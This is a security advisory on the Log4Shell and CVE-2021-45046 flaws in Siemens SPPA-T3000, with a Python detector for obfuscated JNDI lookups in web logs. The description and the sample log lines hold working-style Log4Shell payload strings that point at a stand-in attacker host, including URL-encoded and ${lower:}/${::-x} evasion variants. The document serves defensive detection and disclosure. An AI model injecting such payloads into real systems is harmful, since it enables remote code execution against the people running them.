A security report states that Siemens SPPA-T3000 deployments are exposed to remote code execution (RCE) through flaws in the Apache Log4j logging library bundled with the product. According to the report, both flaws are rated critical and public exploit code exists for each, so operators of affected systems should follow the advisory closely.

Below is a brief description of each reported flaw, together with its CVE identifier and its score under the Common Vulnerability Scoring System (CVSS).

CVE-2021-44228 (Log4Shell): Log4j evaluates JNDI lookup expressions, such as ${jndi:ldap://attacker-host/x}, that appear in data it logs, without validating their origin. A remote, unauthenticated attacker who can get such a string written to a log (for example via a request header or a login field) makes the application contact the attacker's LDAP or RMI server and load the object it returns, which results in arbitrary code execution on the target system.

The flaw is rated critical: the report gives it a CVSS score of 9.8/10 (the NVD entry scores it 10.0), since a successful attack hands the attacker full control of the affected system.

CVE-2021-45046: The fix shipped in Apache Log4j 2.15.0 for CVE-2021-44228 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example $${ctx:loginId}), an attacker who controls Thread Context Map (MDC) input data can supply a JNDI lookup pattern that is evaluated when the log line is formatted, causing a denial of service (DoS). Apache later re-rated the flaw (CVSS 9.0) after it was shown to allow information leakage and, in some environments, remote code execution.

Apache Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default, which is why its fix is incomplete rather than absent. Note that earlier configuration-based mitigations, such as setting the system property log4j2.formatMsgNoLookups to true (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS), do not protect against CVE-2021-45046, because the lookup is triggered by the pattern layout rather than by message formatting. Apache's guidance is to upgrade Log4j (2.16.0 or later) or, where that is not possible, to remove the JndiLookup class from the log4j-core jar.

The report states that these flaws affect all versions of the SPPA-T3000 Application Server.

Both vulnerabilities are being exploited in the wild by unauthenticated remote attackers, and at the time of the report no vendor patch was available. Operators of affected deployments should monitor Siemens and Apache for updates and, in the meantime, watch their own logs for exploitation attempts.
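With no patch available when the report was written, spotting exploitation attempts in inbound request data is the practical control. The following is an added example written for this page; it is not code from the report, from Siemens or from the Log4j project. It scans constructed web-server access-log lines (the IP addresses, paths and user agents are made up) for Log4Shell-style lookups, first undoing the tricks public exploits use to evade plain string matching: URL encoding, nested ${lower:}/${upper:} lookups and the ${::-x} default-value form. The same normalisation applies to any field that ends up in the Thread Context Map, which is the input path CVE-2021-45046 abuses. The set of lookup prefixes treated as obfuscation wrappers is an assumption chosen for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Lines 2-4 carry
# Log4Shell payloads: plain, URL-encoded with a ${lower:} wrapper, and spelled
# out with the ${::-x} default-value trick. Line 5 is a benign lookup.
SAMPLE_LOG = """
10.0.0.5 - - [11/Dec/2021:10:01:22 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [11/Dec/2021:10:02:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"
10.0.0.8 - - [11/Dec/2021:10:02:15 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.9%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.79"
10.0.0.9 - - [11/Dec/2021:10:03:40 +0000] "POST /login HTTP/1.1" 401 0 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.9/c}"
10.0.0.10 - - [11/Dec/2021:10:04:02 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# An innermost ${...} expression: one with no nested "${" inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# Lookup prefixes attackers wrap around the payload purely to defeat string
# matching (assumed set for this example). The empty prefix covers the
# ${::-x} form, which Log4j resolves to its default value "x".
OBFUSCATION_PREFIXES = {"", "lower", "upper", "env", "sys", "date", "java",
                        "main", "sd", "marker", "log4j", "bundle", "map", "ctx"}


def _resolve(match, state):
    """Evaluate one innermost lookup roughly as Log4j's StrSubstitutor would,
    leaving jndi (and unknown) lookups untouched for the detector."""
    body = match.group(1)
    var, has_default, default = body.partition(":-")
    prefix, _, key = var.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":
        state["changed"] = True
        return key.lower()
    if prefix == "upper":
        state["changed"] = True
        return key.upper()
    if prefix in OBFUSCATION_PREFIXES:
        # Cannot be evaluated offline; Log4j falls back to the default, if any.
        state["changed"] = True
        return default if has_default else ""
    return match.group(0)


def normalize(text, max_passes=16):
    """URL-decode, then collapse nested lookups inside-out until stable."""
    text = unquote(unquote(text))  # public exploits often double-encode
    for _ in range(max_passes):
        state = {"changed": False}
        text = INNERMOST.sub(lambda m: _resolve(m, state), text)
        if not state["changed"]:
            break
    return text


# Log4j matches the lookup name case-insensitively, so JNDI, Jndi, ... all fire.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)?", re.I)


def detect(line):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a
    Log4Shell-style lookup after normalisation, otherwise None."""
    m = JNDI.search(normalize(line))
    if not m:
        return None
    return (m.group(1) or "?").lower()


def scan(log_text):
    """List (line number, scheme) for every line that triggers the detector."""
    hits = []
    for lineno, line in enumerate(log_text.strip().splitlines(), 1):
        scheme = detect(line)
        if scheme:
            hits.append((lineno, scheme))
    return hits


if __name__ == "__main__":
    for lineno, scheme in scan(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup via {scheme}")
```

Run against the sample, lines 2, 3 and 4 are reported (ldap, ldap and rmi) while the benign ${date:yyyy} on line 5 is not. The normaliser deliberately stops as soon as a pass changes nothing, so a bare ${jndi:...} is never consumed and an unbounded chain of lookups cannot loop forever; a real deployment would feed it every attacker-controlled field, not only the user agent and query string.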

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.